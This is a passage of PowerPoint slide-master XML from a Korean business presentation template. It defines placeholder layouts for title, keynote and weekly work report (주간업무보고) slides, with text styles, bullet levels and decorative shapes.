            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각주</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>본문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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8874000" y="6543248"/>
            <a:ext cx="233538" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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2" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754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436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키노트_내용 - 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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537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15" y="1152000"/>
            <a:ext cx="8394252" cy="442346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="24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마스터 제목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5115" y="2160000"/>
            <a:ext cx="8394252" cy="3600000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="18000" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-252000">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
              <a:defRPr sz="20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504000" indent="-2520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defRPr sz="18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7560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arenR"/>
              <a:defRPr sz="16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08000">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr sz="14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206000" indent="-180000"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lphaLcPeriod"/>
              <a:defRPr sz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0" indent="0">
              <a:buFontTx/>
              <a:buNone/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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각주</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>본문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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8874000" y="6543248"/>
            <a:ext cx="233538" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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2" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754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653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키노트_내용 - 비순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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537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15" y="1152000"/>
            <a:ext cx="8394252" cy="442346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="24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마스터 제목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5115" y="2160000"/>
            <a:ext cx="8394252" cy="3600000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="18000" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="20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504000" indent="-2520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756000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008000">
              <a:spcBef>
                <a:spcPts val="60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ü"/>
              <a:defRPr sz="14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1170000" indent="-144000">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="-"/>
              <a:defRPr sz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0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각주</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>본문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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8874000" y="6543248"/>
            <a:ext cx="233538" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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2" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754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365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키노트_문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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537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5115" y="770400"/>
            <a:ext cx="8394252" cy="4831200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="18000" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="28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0" indent="0" algn="ctr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None/>
              <a:defRPr sz="24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0" indent="0" algn="ctr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None/>
              <a:defRPr sz="20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0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="18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0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="16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0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="14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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>키노트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 문장 슬라이드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>첫째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>둘째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>셋째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>네재</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 수준</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기본 본문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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8874000" y="6543248"/>
            <a:ext cx="233538" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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2" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754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44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키노트_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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537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5115" y="770400"/>
            <a:ext cx="8394252" cy="4831200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="18000" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="4400" b="1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0" indent="0" algn="ctr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None/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" algn="ctr"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Tx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>키노트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 단어 슬라이드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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8874000" y="6543248"/>
            <a:ext cx="233538" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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2" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754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321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주간업무보고-일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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537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4400" y="439200"/>
            <a:ext cx="1454400" cy="442800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="1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주간업무보고</a:t>
            </a:r>
            <a:endParaRPr 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1950181" y="439200"/>
            <a:ext cx="4302771" cy="4428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1800" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0058A6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kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>팀명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7458690" y="662400"/>
            <a:ext cx="1310910" cy="4428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FontTx/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" baseline="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kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>날짜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331871"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="374400" y="1121869"/>
          <a:ext cx="8395200" cy="536760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419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3527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A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4073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374400" y="1121868"/>
            <a:ext cx="4189916" cy="307361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1200" baseline="0">
                <a:latin typeface="(한글 글꼴 사용)"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실적</a:t>
            </a:r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6" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4564316" y="1121867"/>
            <a:ext cx="4205284" cy="307362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sz="1200" baseline="0">
                <a:latin typeface="(한글 글꼴 사용)"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>계획</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25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8874000" y="6543248"/>
            <a:ext cx="234000" cy="252412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D94ACED-6144-4B78-9E59-762D97A9E2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5115" y="1429230"/>
            <a:ext cx="4189201" cy="5060240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="72000" tIns="72000" rIns="72000" bIns="72000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▪"/>
              <a:defRPr sz="1100" b="1" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="216000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▫"/>
              <a:defRPr sz="1050" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="360000" indent="-144000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1000" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="-168275">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="◦"/>
              <a:tabLst/>
              <a:defRPr sz="1000" b="0" i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4pPr>
            <a:lvl5pPr marL="669925" indent="-138113"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  <a:tabLst/>
              <a:defRPr sz="950" b="0" i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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_01</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Freeform 42"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462195" y="0"/>
            <a:ext cx="681805" cy="494754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FCCF1956-31C9-9F44-90C0-E3FA410C4E5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580399" y="1429230"/>
            <a:ext cx="4189201" cy="5060240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="72000" tIns="72000" rIns="72000" bIns="72000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▪"/>
              <a:defRPr sz="1100" b="1" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="216000" indent="-108000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface=".Lucida Grande UI Regular"/>
              <a:buChar char="▫"/>
              <a:defRPr sz="1050" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="360000" indent="-144000">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1000" baseline="0">
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="-168275">
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="◦"/>
              <a:tabLst/>
              <a:defRPr sz="1000" b="0" i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4pPr>
            <a:lvl5pPr marL="669925" indent="-138113"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  <a:tabLst/>
              <a:defRPr sz="950" b="0" i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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_01</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Level_05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2760586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주간업무보고-디자인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43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8769367" y="5704463"/>
            <a:ext cx="374633" cy="1153537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 316"/>
              <a:gd name="T1" fmla="*/ 973 h 973"/>
              <a:gd name="T2" fmla="*/ 316 w 316"/>
              <a:gd name="T3" fmla="*/ 973 h 973"/>
              <a:gd name="T4" fmla="*/ 316 w 316"/>
              <a:gd name="T5" fmla="*/ 0 h 973"/>
              <a:gd name="T6" fmla="*/ 0 w 316"/>
